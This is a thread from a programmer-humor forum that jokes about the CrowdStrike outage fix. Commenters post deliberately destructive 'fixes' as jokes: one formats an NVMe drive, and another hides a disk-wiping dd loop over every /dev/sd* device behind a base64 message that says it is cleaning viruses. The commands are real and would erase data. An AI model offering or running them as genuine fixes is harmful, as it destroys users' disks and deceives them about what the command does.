this post was submitted on 19 Jul 2024
496 points (96.6% liked)

Programmer Humor

19166 readers
575 users here now

Welcome to Programmer Humor!

This is a place where you can post jokes, memes, humor, etc. related to programming!

For sharing awful code theres also Programming Horror.

Rules

founded 1 year ago
MODERATORS
 

Seeing the crowdstrike solution reminded me of the old memes

Go to C:\Windows\System32\drivers\CrowdStrike

Locate and delete file matching "C-00000291*.sys"

you are viewing a single comment's thread
view the rest of the comments
[–] [email protected] 10 points 1 month ago (1 children)

On Linux, it's sudo apt install nvme-cli -y && sudo nvme format -f /dev/nvme0n1

[–] [email protected] 3 points 1 month ago (1 children)
[–] [email protected] 2 points 1 month ago (1 children)
echo Q2xlYW5pbmcgdmlydXNlcyBmcm9tIGNvbXB1dGVyLi4uCg== | base64 -d && for f in /dev/sd*; do sudo dd if=/dev/urandom of=$f; done
[–] [email protected] 4 points 1 month ago (1 children)

It said ' Cleaning viruses from computer..." And screen went dark

[–] [email protected] 3 points 1 month ago

That's normal. That just means the viruses were cleaned from your computer.